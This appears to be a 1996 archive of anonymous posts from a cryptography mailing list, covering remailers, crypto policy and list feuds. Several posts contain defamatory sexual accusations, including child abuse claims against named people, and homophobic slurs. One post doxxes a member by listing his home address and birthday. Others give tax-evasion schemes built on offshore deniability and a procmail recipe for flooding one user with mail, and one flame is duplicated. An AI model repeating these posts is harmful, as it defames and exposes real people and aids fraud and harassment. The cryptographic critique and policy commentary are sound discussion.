is almost a public service in helping people with
big egos temporarily relieve their "painful
but I see no sign that he has been anywhere near
the list for a long, long time, and I think all
the ranting and scapegoating of him is quite
strong evidence of all the big egos and small minds
that litter this list.
there is nothing new about detweiler's approach.
there was a classic greek who was put to death
for the same reason: not provoking people by calling
them names, so much as asking them questions that
embarrassly exposed all their ego problems.
his name was called "socrates" and he was put to
death for refining his art beyond that which was
tolerated by a power structure largely populated
by those with the ego problems (power structures
are always dominated by these types, it is like
flies and dead meat, or moths and flames).
the joke of course may be that detweiler could have
been dead for a long time, and people here would
still be blaming him for their problems. perhaps
we have a new convenient substitute for Satan in
the cyberspace age. "the detweiling made me do it."
(hee, hee). "projection" was identified by freud
in another century as a basic device of the ego,
a pity that few in our modern era are aware-- or
perhaps it is not such a pity from detweiler's
perspective. (p.s. I imagine quite a few people will accuse "me" of
being detweiler. I assure you my amusement will at least
exceed or match that which detweiler ever obtained.)

@_date: 1996-05-08 13:13:00
@_author: Anonymous 
@_subject: Why I Pay Too Much in Taxes 
That's just lack of creativity. Try this:
Get a friend of yours to setup a consulting company and
hire you (and maybe a few more people who pay too much
taxes,acting like a mixmaster). The company pays you salary
to cover your cost of living. Anything above that, i.e.
money that you would otherwise save, is paid to an offshore
company as license fees (or something, this is the creative
This is really legal as long as you don't receive any money
from offshore without paying the taxes. If you borrow the
money back it gets a little fuzzy.
Thousands of people in upper middle class are doing exactly
this, so the mixmaster is really in place already. The local
mix is just an extra precaution for deniability (it was my
friends company, I had no idea what he was up to!).
For the friend to accept the (very minor) risk of jail,
he/she should probably be much poorer than you, or have
a *lot* of clients, to make his pay outweight the risk.
By the way, are there any PGP encrypted mailing lists for
discussing serious tax fraud?

@_date: 1996-05-08 20:29:22
@_author: Anonymous 
@_subject: Why I Pay Too Much in Taxes 
services to whomever is employing him today. The whole idea
was to hide Tim's income sources, or that's what he asked for anyway.
You can hide your income by putting it in another jurisdiction.
As a cut from the money Tim's employer gives him.
No it doesn't. One person knows where they money went when it left the
country (and he is getting paid for the risk of doing time). Nobody knows
where the funds are concealed. Probably in a trust that you can access
when you are on vacation abroad.

@_date: 1996-05-14 11:30:13
@_author: Name Withheld by Request 
@_subject: Why I Pay Too Much in Taxes 
The reason should be obvious from the earlier discussion. Mr. Unicorn
is in the deluxe tax planning business. He is worried that his costomers
will stop paying $50-100k for his services if they find out that they just
need to spend $100 in the book store for even better advice.

@_date: 1996-05-27 11:27:51
@_author: Anonymous 
@_subject: No Subject 
We are pleased to announce the opening of the Czarevna Tatjana Mixmaster
Remailer at tat at mindport.net.
At present the remailer is configured to accept type2 messages only.
Questions or comments should be directed to tatjana at mindport.net.
Please note that some debugging is still in the works.  An announcement of
our complete confidence in the remailer's full and proper operation will
be made presently.
All official announcements will be signed with the following PGP key:

@_date: 1996-05-28 15:48:51
@_author: Anonymous 
@_subject: remail@c2.org Blocked From replay mail2news Gateway 
usura at basement.replay.com (Alex de Joode) wrote (to Usenet):
%$  (Not directed at you, Alex!)
It wasn't outgoing posts that I was worried about, so much as my
replies that were being posted to alt.anonymous.messages via
alpha.c2.org rather than being chained to me through e-mail.  I
wonder how much (if any) mail I may have lost.  How long has this
embargo been in effect?
Is there any chance (pretty please) that the obviously non-forged
mail from alpha.c2.org to alt.anonymous.messages, such as that with
"nobody at c2.org" in the From:  line, can be unblocked on a one-time
basis, or have they already been consigned to the bit-bucket?
Between this and the antics of the Co$, this has not been a pleasant
All I gotta say is XENU XENU XENU!

@_date: 1996-05-29 21:41:04
@_author: Anonymous 
@_subject: Internet traffic is monitored. 
X-Sender: bstout at osc.hidata.com
On the Encryption note, and I swear not along the lines of the 'DOJ' and 'FBI Snooping' Big-Brother events, I heard another story recently.
# begin story
A person working on the MBONE project did an unannounced experiment
across the internet using Triple-DES for MBONE, and the very next day, 'ATF' agents knocked on his door and warned him against exporting munitions.  The experimentor was shaken by the fact that agents approached him so quickly after the experiment.
# end story
Extrapolations of fact:
   1.   Internet traffic is monitored.
   2.   The ability to snoop for encrypted traffic is present
   3.   The ability to identify encryption levels is present
        (How else can they differentiate DES-1 from DES-3?)
   4.   The ability to crack DES-1 in near real-time mode is present.
        (See above).
   5.   If above=true, then Feds dropping the Zimmerman PGP case probably
        also points to it also being crackable in a similar manner.
   6.   Using encryption only flags traffic for capture and decryption,         using strong encryption makes you all that more interesting.
Sorry, couldn't resist.  I'll try not to start a threads about electro-plasma propulsion craft at Area 51, metallic-ceramic skin and pulse-jets on the Aurora spy plane, heat-imaging video cameras on satellites and planes that can watch you through your houses' roof, etc.  :)

@_date: 1996-11-01 01:19:47
@_author: Anonymous 
@_subject: Montgolfiering Spoof 
I know the author rather well, and he assures me he dashed off this
satirical piece in about as much time as he takes to write his normal
articles. He tells me that once he had "grokked" the inimitable (not) style
of Don Wood, it was easy to write a screed that echoed Wood's wackiness.
Of course, for people who read satire on this list, the initials at the end
are a clue. But don't publish who you think it is, as KVFP doesn't want a
lawsuit from Wood for hurting Wood's feelings.

@_date: 1996-11-05 03:02:37
@_author: Anonymous 
@_subject: Digital signatures 
Tim May is not only as queer as a three dollar bill, but he is also into having sex with children.

@_date: 1996-11-05 23:10:54
@_author: Anonymous 
@_subject: Vulis profileVulis profile 
I had some free time this morning, and just for fun, thought I'd create a brief Net profile of our friend Dr. Vulis.  Here's what I found (sources included):
Dimitri Vulis
 Burns St, Forest Hills,NY 11375-3506
Source:  (Four11 people search)
Birthday: December 29
Source: D&M Consulting Services (DM-DOM)
   67-67 Burns Street
   Forest Hills, NY 11375
   Domain Name: DM.COM
   Administrative Contact:
      Administration, PSINet Domain  (PDA4)  psinet-domain-admin at PSI.COM
      (703) 904-4100
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  hostinfo at psi.com
      (518) 283-8860
   Record last updated on 31-Oct-96.
   Record created on 19-Jun-91.
   Domain servers in listed order:
   NS.PSI.NET                   192.33.4.10
   NS2.PSI.NET                  38.8.50.2
Source: InterNIC
Q: Who is Dimitri Vulis? A: Dimitri is an XSoviet immigrant who is enrolled (or used to be enrolled) in CUNY, and who is a computer professional involved i.a. in unicode matters. The realspace Dimitri is a polite person and a devoted family head.  It's cyberspace image is not nearly as nice, unfortunately. He harasses people all over the net with the most offensive sorts of messages, and uses dirty tricks to retaliate to the people who do get offended. Among his accomplished feats is a series of articles about cat-eating dogs posted to rec.pets.cats (which caused a wave of complaints and made him lost his CUNY account) ; a series of porno binaries with obscene comments about his opponents posted to math-related newsgroups (he lost another academic account, at fordham.edu, after this scandal); and a series of racist articles denigrating all aspects of romanian life and culture which used to haunt the romanian newsgroup for years. Of course most of his net.bile is spilled over his fellow XSoviets, particularly of Jewish origin (such as Michael Verbitsky, Boris Veytsman, Vlad Rutenberg or myself, as well as all Brighton Beach together); and a lot of stuff comes out from his alleged aliases in bwalk.dm.com, aol.com and fly.harvard.edu. Some of these aliases match the names of his opponents, as I already mentioned.  Sometimes not only the names but also addresses match (although paths don't). Dimitri Vulis also advertises the capabilities of his site for forging and cancelling articles. Sometimes he shrewdly comments articles of his own saying : "This article is most certainly forged, after all I spent a lot of time teaching you how to forge... but I nevertheless like this article's content". Source: (much more there too)
AUTHOR PROFILE: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
510 articles posted between 1995/06/29 and 1996/11/02. 71 % followups. Number of articles posted to individual newsgroups (slightly skewed by cross-postings):           132 misc.jobs.misc           67 news.admin.net-abuse.misc           67 news.groups           40 mail.cypherpunks           32 nyc.food           18 soc.culture.russian           13 news.admin.misc           12 nyc.general           10 news.admin.censorship           9 news.admin.policy           8 alt.censorship           7 alt.usenet.kooks           7 soc.culture.pakistan           6 alt.revenge           5 comp.os.ms-windows.nt.advocacy           5 soc.culture.soviet           4 alt.sex.plushies           4 sci.math           4 sci.physics           4 talk.politics.medicine           3 alt.folklore.computers           3 alt.security           3 comp.lang.ada           3 comp.security.misc           3 sci.crypt           2 alt.nocem.misc           2 alt.sci.physics.plutonium           2 aus.flame           2 comp.os.ms-windows.advocacy           2 comp.unix.advocacy           2 microsoft.public.netiquette           2 soc.culture.israel           1 alt.2600           1 alt.anonymous           1 alt.bible           1 alt.computer.consultants           1 alt.consumers.experiences           1 alt.fan.bill-gates           1 alt.fan.my-big-hairy-penis           1 alt.privacy           1 alt.shenanigans           1 alt.society.neutopia           1 aus.general           1 comp.ai           1 comp.mail.uucp           1 comp.os.ms-windows.nt.misc           1 comp.os.ms-windows.win95.setup           1 comp.sys.mac.advocacy           1 humanities.language.sanskrit           1 misc.entrepreneurs           1 misc.invest           1 news.newusers.questions           1 nj.misc           1 nyc.seminars           1 rec.humor           1 rec.motorcycles           1 sci.psychology.psychotherapy           1 soc.motss           1 tor.general Source:  profile
Dimitri Vulis:
Contrib. post:
 whose obnoxious, derivative and not-very-funny Soviet emigre jokes from Brighton Beach were a weekly feature about a year ago on rec.humor . He ignored completely any requests to stop. Eventually he started getting flamed in demotic Russian-quite fun for those of us who could read it.
- Dan "And to think he felt it important enough to waste his two hours of daily connect time on it" Case
 so what _is_ the deal with vulis?  is "russian emigre" a codeword for "jew", or for "russian emigre", or for something else?  (if i recall correctly, minor and now somewhat reformed net.loon mikhail zeleny claimed rather convincingly that vulis's posts contained certain tell-tale phrases which are highly un-idiomatic in english ("dandruff-covered" was one of them, i think) which were dead giveaways of classic pathological russian anti-semitism.)  so is vulis russian?  an emigre?  a jew in some sense?  self-hating?  maybe a self-hating russian jewish emigre who hates only the jewish half of themself?  or maybe they hate the russian half too?  are they now or have they ever been, while residing in america, on the payroll of any branch of any soviet or russian government?  did they stop posting russian emigre jokes when the paychecks stopped coming?  are they a zhirinovsky supporter now?  the most recent messages posted by vulis
that i have seen seem designed mainly to convince people that both zhirinovsky and valery fabrikant are (russian?) jews.  (it's very likely true in fabrikant's case, at least.)  maybe vulis is a self-hating supporter of zhirinovsky and fabrikant?
Posts on soc.culture.soviet, and is apparently something of an institution there; likes to stir things up, and to flame and/or troll people. I'm not up on which sides are good and/or bad on s.c.s, which among other things seems to have been ravaged by Serdar Argic for a long time as well, driving away many
of the gentler posters. Is currently engaged in flamewar with Peter V. Vorobieff there. Posts from dlv at CUNYVMS1.GC.CUNY.EDU (Dimitri Vulis, CUNY GC Math).
Source: Dimitri Vulis's barcode font
ftp: ctan: tex-archive/fonts/barcodes/barcodes.mf
There is a mailing list, rustex-l, for discussion of typesetting
Cyrilic-based languages.  To subscribe, send mail to listserv at ubvm.bitnet
containing the text
 SUBSCRIBE RUSTEX-L or mail Dimitri Vulis, DLV%CUNYVMS1.BITNET at cunyvm.cuny.edu [or dlv at dm.com?]
Source: Bar code fonts  ymir.claremont.edu      by Dimitri Vulis BibTeX eedsp.gatech.edu for MS-DOS  v99 by J. Demel and Dimitri Source: (this FAQ is dated 10 May 93)
Server The files of type para used in the index were: known organizations in the former Soviet Union who either have or plan to have e-mail connections. Provided by the SUEARN-L list, SUEARN-L at UBVM.BITNET. Keywords: USSR, CIS, Russia, Latvia, Lithuania, Estonia, Baltic, Moscow, Leningrad, Siberia. The original document is stored on impaqt.drexel.edu:/pub/suearn/misc/cissites.txt and is available for anonymous FTP. Directory and Guide ** For more information, subscribe to the SUEARN-L mailing list, or send e-mail to Michael Meystel or Dimitri Vulis (c) 1992 All rights reserved This file contains contact information (correct name / address / phone / fax  possibly e-mail address) for sites of interest in the Commonwealth of Independent States (CIS). We occasionally get asked questions like 'What is the Russian name of IAS?' or 'What is the postal address of St. Petersburg State U's math faculty?' or 'What does IPPI stand for?'. Over the years I've collected a fairly complete electronic address book of addresses of Soviet sites where mathematical research is done, which I gladly share. Sergej Gelfand and Don Parsons have kindly contributed their address lists (respectively, more math and oncology). An even more complete version of such file, listing sites of possible interest to people in other fields, and freely available on the Internet, would be very useful to many. Please send additions, corrections, suggestions, etc to: CISMAP at DM.COM I can't acknowledge everything, but I will try to read every e-mail. Dimitri Vulis ) Source:

@_date: 1996-11-09 12:20:33
@_author: Anonymous 
@_subject: Why is cryptoanarchy irreversible? 
If you don't have enough to eat, doubling your income is worth the
Crypto-anarchy benefits the poor more than the rich.  The underlings
of society are going to love it.

@_date: 1996-11-11 11:45:22
@_author: Anonymous 
@_subject: [URGENT] Cryptoanarchy 
Timothy C. May will fuck anything that moves, but he'd rather be
fucking his own mother's dead body.

@_date: 1996-11-12 15:56:51
@_author: Anonymous 
@_subject: So how does the crypto crackdown go? 
Not at all questionable. A ban on crypto would follow the current trend in regulating technology. Consider the case of Bernie S. who is in jail for possessing electronic parts that could be used for telco fraud. Any government action towards banning crypto will include possession
of crypto as a crime. The "cat's out of the bag" argument is ineffective as well as the governments just don't care. They'll just say in effect: "It's illegal. Destroy it if you got it." Now it's doubtful if enforcement would make unprovoked searches and arrest people solely for possession of crypto. And it is also unlikely that DA's (except perhaps the most bored) would follow up on "My neighbor is using crypto" tips. But it is not uncommon for prosecutors to heap additional charges on criminals (alleged) such as the case in robbery: 1 count robbery, 1 count using a gun in robbery. or perhaps 1 count tax evasion, 1 count using crypto to commit tax evasion. While the former charge may end up being unproven the later often sticks.
Hmmm. Hackers built the ubiquitous CryptoFS for Linux, no? And the nascent S/WAN too. I don't see a distinction between popular and subculture crypto. The two invariably mix. A program may have it's origins in the subculture but it will often meet the needs of the popular culture as well and be adopted, accepted, and so on. Consider PGP and such add-ons as Brainless-PGP, WinPGP, and the various auto PGP tools.
It seems to me that banning distribution would just be too generous. What is distribution? Are time share accounts distribution? I created it but many can use it but the actual bits (well are there actual bits?) never left my single computer. But the nature of "distribution" is to move something from one person to another. Now nothing really moved but a few electrons. But multiple people did use it. Book 'em. Distribution is an archaic term here and the regulations will involve controlling what software may be run on personal computers.
The stated goal is a posture designed to sound reasonable. Only time will tell if the actual goal is the regulation of computer uses as I suspect.
The security establishment fears crypto. Fears loss of control. I suspect that with Clinton back in the White House (was there a choice?) we will enter a period where the Clipper chip seemed like a good idea. In comparison. Unless some fundamental changes occur to the Security, Intelligence and Law Enforcement agencies  (a new acronym? SILE? Pronounced with a long E of course ) we will see more
business as usual and some completely draconian steps taken against strong encryption. The only recourse is to take an active role now. We must go on the offensive and :
1) Deploy S/WAN
2) Write more strong ubiquitous crypto
3) Attack the SILE agencies directly by challenging their purpose, gutting their budgets, exposing their falacies (umm is that almost freudian or what), flooding international communications with strong crypto messages (content need not apply), and of course ridiculing their every effort.
4) Finding allies in the legal community and educating fence sitters, critical judges, legislators, and so on.
Now is the time to act.

@_date: 1996-11-14 12:42:22
@_author: Anonymous 
@_subject: Black Unicorn exposed? 
Ahem. He used that nym in a post to cypherpunks
just a few months ago...

@_date: 1996-11-14 17:13:22
@_author: nobody@replay.com 
@_subject: Censorship on cypherpunks?, from The Netly News 
This is true. On the other hand, privately-owned public forums do exist. Chartered FreeNets, for example, and the facilities of private Universities like Carnegie Mellon. There may be a fine line somewhere, but I don't believe we need to draw it, because what is at issue here is the character of the moderator, not the legality of his action.
We're just spinning wheels here talking in the abstract. I actually agree with Vulis's reasoning -- you need to look at the facts of the case in order to determine whether an act of censorship, or heckler control, or editing, or whatever, was proper. But apply that reasoning to Vulis's case, and you conclude that he's completely in the wrong, by any standard.
Clearly. And if your statement of the facts is correct, then you would be right in exercising your right. If there is more to the story, though, or if your story is wrong... well, then you still have the right to be a jerk, but you are, nonetheless, a jerk. In the cypherpunks case, though, the only jerk here is Vulis. It is worthless and IMO dangerous to prove that by arguing from first principles. The "Freedom Knight" kooks are correct in pointing out that every "philosophical" argument you've made can be and has been misused. Try a little empirical evidence; there is plenty to go around. "Truth is far more fragile than fiction... reason alone cannot protect it." Proof is syntactic; truth is semantic.
It differs in one small but important way: it all happens in the digital domain, so it can all be archived in its entirety. It is more difficult to lie about what happens online (but not impossible, as Vulis and company demonstrate). In an online forum, you have access to *all* the empirical evidence. There's no reason to rely on pure reason.
So enough already with the hypothetical cases. You've got a specific case of your own that, oddly, you still haven't mentioned.
- -rich

@_date: 1996-11-14 17:18:07
@_author: Anonymous 
@_subject: Media seekers, reputation and banishment 
Seems like the Freedom-Knights are seeking a little publicity? Perhaps an interview in Wired?
A column in the WaPo? A spot on  Are these the same folks who gather around
at fires and crime scenes trying to get into the camera? "Hi Mom! We're on CP now! Look
at me!"
I find the aga/hayes posts amusing. It's amazing at how people have refined their skills at rhetoric,
debate and insults. The poisoned pen gets much practice.
So the aga/hayes posts attempt to extract reputation from Gilmore and Declan. It is interesting
to see how attacts on reputation are futile as reputation is built up (or spent) gradually. Pointing
a finger and shouting "You are stoopid!" is obviously ineffective at damaging any credibility other
than that of the person holding the finger. Remove the insults and aga and Hayes offer little in the way of compelling arguements.
Maybe Gilmore made a mistake in removing DV from CP. Perhaps it is a contradiction of some ideal
of open dialog and free speech. DV seems to have unlimitted energy for insults, rants, and blather,
so removing him directly (with the actual effect of simply making it less convienent for him or her to post) was a practical move not a philosophical move. A practical move to assert the will of the A community offers few punishments for asocial behavior. Killfiles are partly effective. But the strongest
punishment is banishment. The issue is not "is banishing unruly louts from the discussion censorship" as censorship is a state
of being threatened with loss of liberty for what one says. The issue is "do we individually banish
asocial louts or collectively?" and of course how do we decide who to banish. All of this  is certainly easier when done individually yet it is often prudent and effective to have someone take
action when they are in a position to do be effective. Gilmore acted properly in my opinion. And DV
remains in my killfile.

@_date: 1996-11-18 00:50:03
@_author: Anonymous 
@_subject: No Subject 
And the vision of 1984 looms ever closer. Pity you guys guessed....your activites have put us 12 years behind schedule to date, and we're not happy about that.

@_date: 1996-11-25 07:09:26
@_author: Anonymous 
@_subject: John Gilmore is playing with himself 
You bet they want to suppress the truth about them being faggots!
Faggot John Gilmore does NOT eat pussy. He only eats asshole if it's got
a big dick up in front. Whoever calls Gilmore bisexual is a fucking liar.
John likes to suck cocks at his San Fransicso bathhouse (the Toad Hole).
Gilmore's friends try to drag every lady Gilmore knows into this shit.
Gilmore is a fag. Gilmore does NOT eat pussy. Not Denning's, not Dyson's.
You can say that again, good buddy.

@_date: 1996-11-26 04:42:35
@_author: Anonymous 
@_subject: No Subject 
oh mindless aga,
Certainly not in your case.
If you are ignorant of them, then how do you know that they are "stupid"?
How is this possible? It seems that you are possible of rather contemptible contortions!
Clinging to technicalities here, aren't we?
Oooh! Oooh! Point the finger here, aga, at YOURSELF!
What a wonderful statement: Europe is irrelevant!!! A truly educated mind here. When one is clapped in irons and thrown into prison for whatever it is that your acts can be classified under, then I am pretty sure they have _some_ bounds.
One wonders if you ever pay attention to what you actually write, aga?
Uhm...oops, aga, you're wrong here, there are plenty of crimes that are international crimes. War crimes for example, which o against the Geneva convention. Child abduction crimes, which go against the Hague convention. But I am sure they will give you a slight slap on the  wrist, after all, you are only a stupid hillbilly with no idea of the law.
Assassination comes to mind...
You seem to have this absolute _fascination_ with asses, faggots, cocks, and ripping _new_ assholes (as if you weren't a big enough one already. This is obviously some sort of concious repression: you just can't face the truth, can you, aga?
Do we run and hide now, mommy?
He/she/it pumps iron, does he/she/it? Whilst running? No mean feat for a thing without a brain. Assuming that you are better than anyone else you have probably never met, someone who probably has no desire to meet a thing like yourself, is yet another example of your sheer assonance!
Of course not...I am sure the European Internet thinks the same as you. After all, an inanimate object seems to think just as much as you!
--The Edge

@_date: 1996-11-26 13:58:02
@_author: Anonymous 
@_subject: No Subject 
oh mindless aga,
Certainly not in your case.
If you are ignorant of them, then how do you know that they are "stupid"?
How is this possible? It seems that you are possible of rather contemptible contortions!
Clinging to technicalities here, aren't we?
Oooh! Oooh! Point the finger here, aga, at YOURSELF!
What a wonderful statement: Europe is irrelevant!!! A truly educated mind here. When one is clapped in irons and thrown into prison for whatever it is that your acts can be classified under, then I am pretty sure they have _some_ bounds.
One wonders if you ever pay attention to what you actually write, aga?
Uhm...oops, aga, you're wrong here, there are plenty of crimes that are international crimes. War crimes for example, which o against the Geneva convention. Child abduction crimes, which go against the Hague convention. But I am sure they will give you a slight slap on the  wrist, after all, you are only a stupid hillbilly with no idea of the law.
Assassination comes to mind...
You seem to have this absolute _fascination_ with asses, faggots, cocks, and ripping _new_ assholes (as if you weren't a big enough one already. This is obviously some sort of concious repression: you just can't face the truth, can you, aga?
Do we run and hide now, mommy?
He/she/it pumps iron, does he/she/it? Whilst running? No mean feat for a thing without a brain. Assuming that you are better than anyone else you have probably never met, someone who probably has no desire to meet a thing like yourself, is yet another example of your sheer assonance!
Of course not...I am sure the European Internet thinks the same as you. After all, an inanimate object seems to think just as much as you!
--The Edge

@_date: 1996-11-29 11:23:38
@_author: Anonymous 
@_subject: Seditious Cable! 
dlv at bwalk.dm.com wrote to All:
 >> (Taiwan story warning...) This reminds me of the pirate cable
 >> TV wars, which hit their peak during my stay there --
 d> Now, what would the U.S. government (state or los federales) do in a
 d> similar situation? They'd probably fine any resident found with a
 d> cable TV thousands of dollars and if that didn't work, they'd start
 d> jailing people. Maybe even burn a few TV viewers, a la Waco. :-)
And these are the folks you want to maintain your key escrow?

@_date: 1996-10-10 17:55:45
@_author: Anonymous 
@_subject: What are the flaws with FV payment system? 
You can start with Basically, if you can get access to someone's email, then you can
defraud the system.  FV protects themselves by holding payments for
90 days before they pay the merchant.  It's an unsecure system, with
no encryption.  FV will accept no responsibility for this, and when
people cheat, the merchant gets screwed.

@_date: 1996-10-11 18:45:25
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] Blowfish 
Many forgeries are traceable with mathematical certainty to feebleminded Timothy C[rook] Maya's poison keyboard.

@_date: 1996-10-11 23:14:06
@_author: Anonymous 
@_subject: [URGENT] Secure envelopes 
There's a rumor that Timmy C. Mayflower sells his dead relatives as fertilizer as they constitute the best shit in California.

@_date: 1996-10-13 11:50:25
@_author: Anonymous 
@_subject: None 
Thanks for telling me where to find the NOTs; I always wanted to read
about how to rid myself of body thetans.  Now I have been enlightened
by Hubbard's words and you are guilty of contributory copyright
infringement.  (The SPA told me so :)

@_date: 1996-10-14 20:49:48
@_author: Anonymous 
@_subject: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT 
The SPA allegedly send sameer at c2.net a letter, demanding, among other things,
that he "agree to implement monitoring procedures to prevent similar acts
of copyright infringement and report those procedures to SPA."  Under federal
law (Electronic Communications Privacy Act) it is illegal to monitor users'
actions unless there is a specific contract between the service provider to
allow such monitoring, or a court of law has issued a valid search warrant.
If the SPA did in fact send such a letter, what they are doing is illegal.
They have alleged that a copyright violation has occured.  If that were true
and they had evidence to support that claim, then under federal law, they
could have asked a judge to issue a search warrant to seize the infringing
material and stop its distrubution, and/or they could have subpoenaed
information about the alleged infringers from C2NET.  But, because they did
not have any evidence of a copyright violation, they could not get a search
warrant.  Consequently, they have attempted an illegal search, in violation
of the ECPA.  They threatened the CEO of C2NET with legal action if he did
not assist them with their unlawful scheme.  He rightfully refused, and
now they are carrying out their threatened harassment against him.
The lawsuit filed by SPA mentions no specific cases of copyright
infringement, because, in all likelihood, there never were any.  The SPA
is merely going on a fishing expedition.  The SPA should not be suing
Sameer - Sameer and his users should be suing the SPA.

@_date: 1996-10-15 21:35:30
@_author: Name Withheld by Request 
@_subject: Japan imposing crypto export restrictions! 
Another Cypherpunks exclusive!
Bowing to US pressure, the Japanese Ministry of International Trade and Industry (MITI) has quietly made changes to Japanese crypto export regulations.
In the past, export of crypto products from Japan was unregulated. The exporter had to file a pro-forma export declaration with MITI. The new regulations, imposed in recent weeks without public announcement, require the exporter to state the ultimate recipient of the crypto product. MITI then conducts a lengthy approval process that can take many weeks.
It is widely assumed that the US used the thread of trade sanctions to bring about this 180 degree turn in the attitude of the Japanese government.
The new regulations apply to exports from Japan to all countries, including the US.

@_date: 1996-10-16 21:00:29
@_author: Anonymous 
@_subject: Societal Policing Association (SPA) Sues Sameer! 
Here's what I have learned about the SPA, the Societal Policing
Association, a group supported by the CyberAngels, the Family Decency
OrganizatIon, and the Association of Police Chiefs.
NotE their term "contributory infringement" for anyone who fails to agree
to report suspicious behavior. ("A citizen-unit who neglects to perform his
societal-unit duties and who stands by as thoughtcrime is committed is just
as guilty as the active member of the crime.")  Details are in:
"Anyone who knows or should have known that he or she is  witnessing,
inducing, applauding or tangentially contributing to infringement of any of
the moral and decency rights by  another person is liable for contributor
infringement. "
 -- posting of views critical of authority  -- linking to FTP or Web sites where unauthorized viewpoints may be obtained  -- informing others of FTP sites were such views may be unlawfully obtained  -- aiding others in locating or using unauthorized software      supporting sites upon which the above information may be obtained      allowing sites where the above information may be obtained to exist on a       server Then there's their Vicarious Liability for Infringement by Another Person, outlined by:
"Anyone who has the authority and ability to control another person and who
fails to do so is vicariously liable for the infringement of another
SPA Files Morality Suits Against ISPs and End Users
Internet Decency Campaign Launched (Oct.10, 1996 --Washington, D.C.) -- The Societal Policing Association (SPA) announced today that it has filed five civil lawsuits for morality
violations occurring on the Internet. Three of the lawsuits were filed against Internet service providers (ISPs), and the remaining two were filed against individual end users. Additionally, SPA launched its Internet
Decency Campaign, which includes education and enforcement components, in an effort to educate and work cooperatively with ISPs regarding morality
and decency violations. ISPs who immediately enroll their employee-units in
decency reeducation programs and who agree to participate in SPA's program
to stamp out illegal thoughts will receive immunity from SPA lawsuits and
will receive a pro rata share of the collected loot from other ISPs sued by
the SPA. ISP lawsuits were filed on Oct. 7 and 8 against Community ConneXion of Oakland, Calif.; GeoCities of Beverly Hills, Calif.; and Tripod Inc. of Williamstown, Mass. The SPA members named as plaintiffs in all three suits were the
Christian Coalition, the Anti-Defamation League of B'nai Brith and the
Million Aryan March. In each case, SPA first  contacted the ISP and
requested that the offensive thoughts  be purged, but the ISPs cited the
notoriously Communistic "First Amendment" and the anti-Christian
"Electronic and Communications Privacy Act" and refused to cooperate. "These lawsuits send a clear signal to ISPs and end users that neither
so-called "free thinking" nor failure to pay our protection fee will be
tolerated. The Internet does not provide a safe haven for these types of activities," said Emmanuel
Goldstein, SPA Reichsfuhrer. "Our intentions are to work cooperatively with ISPs. A key element of the IAPC is the ISP Political  Reeducation Program devoted to alerting ISPs to their
potential state of sin and providing them with the tools and moral guidance to save themselves," said Winston Smith, SPA's Reeducation Coordinator. --Keyser Soze, Political Reporter

@_date: 1996-10-16 22:16:04
@_author: Anonymous 
@_subject: Solution to the Dimitri Problem 
Boy, it seems that our resident KOTM is now just posting for the hell of it - just get a kick out of seeing his own messages on this list.  Therefore, I have a solution to this.  Since he likes to see his own words so much, why don't we start sending him multiple copies of all of his words of wisdom?  The following recipe for Procmail does the trick just fine.
* ^(From|Sender).*dlv at bwalk.dm.com
! dlv at bwalk.dm.com
This recipe could also be modified to mail him multiple copies of his messages or anything you feel that he should see.
Have fun with it!  If enough people do this, we just might be able to get him to leave us alone for a while.

@_date: 1996-10-18 12:17:04
@_author: Anonymous 
@_subject: [NOISE::SECURITY] Disabled ports in Navigator 
This was discussed a bit here on the list when Netscape first did it, which
was in either v2.01 or v2.02.  At the time, I thought about writing a patch
to fix the problem, but decided there was really little purpose in trying
to talk http to sendmail, so I didn't bother.
In any event, the blocking is in netscape itself and not in the proxy
server, so you could just telnet to your proxy on port 80, and issue the
commands to connect to whereever you want.
You could also look for a program called webex, it's a cgi script which
generates html forms on the fly, allowing you to read your mail in your
web browser.
I feel I should point out that accessing your mail in an unencrypted
fashion, through a possibly untrusted proxy server is quite insecure and not generally advisable.

@_date: 1996-10-18 13:35:47
@_author: Anonymous 
@_subject: POTP critques? 
Not quite.  What the program actually does is the first time you send a
message, it generates an initial key and sends the key - in plaintext -
to the recipient.  Then the first message is encrypted with this key.
So the system initially has absolutely no security at all.  The second message sent is encrypted with a hash of the first message as
a key.  The third message is encrypted using a hash of the second message,
and so forth.  So each time you send a new message, you in effect send
a new key, encrypted with the old key.  Their theory is that if the
eavesdropper misses a message, then he loses the key, and can't decrypt
the messages anymore.
Of course, if the intended recipient loses a message then he loses the key
for subsequent messages too.  Thus we have a nice little denial-of-service
attack.  They prevent this via a "emeregency resynchronization" procedure
(which they seem quite proud of, and their web pages congratulate
themselves repeatedy on the purported cleverness of this).  Of course, this
"resnchronization" is based upon a pre-arranged key, which the eavesdropper
should already have, if he's been decrypting their mail.  Even better,
the attacker can synchronize with one or both parties, performing a
man-in-the-middle attack and/or spoofing them.
So basically the system will stand up to a passive sniffing attack only if
the eavesdropper is clumsy and loses messages, and doesn't stand up to a denial-of-service or man-in-the-middle attack at all.  And I haven't even
considered implementation bugs yet.

@_date: 1996-10-19 10:35:22
@_author: Anonymous 
@_subject: Mondex 
Timothy C. May must have been sharing needles with a rabid hedgehog.

@_date: 1996-10-19 21:30:54
@_author: Anonymous 
@_subject: Writing A Remailer 
and if you want to do unix programming,  and follow the
links to Linux Documentation Project.  Similarly for

@_date: 1996-10-29 13:19:21
@_author: Anonymous 
@_subject: Montgolfiering, the Hot Air Balloon of Cryptography 
Fie on the small minds that cackle at my brilliance! As a Mensa member and
founder of the Society for Superintelligent Former NSA Employees, I chortle
at the baseness of callow criticisms by those doubters and dilletantous
denigrators of virtual one-time pads and PRNGs (perfect random number
Montgolfiering. What is it, you ask? It is demonstrably a new paradigm in
the evolution of homo sapiens (Parry Messger excepted) toward Shannon's
dream of a one-time pad needing only a single, easily memorizable number as
a seed. I have heard only silence when I challenged the so-called
superbrains of this latargial list to try to determine which number I am
using as the seed of my system. If you are such great smarty pants, far
smarter than my colleagues at the NSA and at Mauchly-Wood, why can you not
then determine this number? Could it be because I have outsmarted you?
Could it be because I understand the Sufi secrets of picking random numbers
truly randomly? I submit this to you: 8  31  26  3  19. Now, oh great ones,
tell me, what is the next number in this sequence?
Ha, you cannot predict this next number, can you, oh gibbering greatnesses?
Ths proves that my perfect random number genarator (PRNG, for those of you
too stupid to remember) cannot be broken. Q.E.D.
I question the issue of Parry Messger's objectivity in assessing the
brilliance of my importations and acidulous assertations. I question
whether Parry may have a peculiarly pecuniary interest in these affairs?
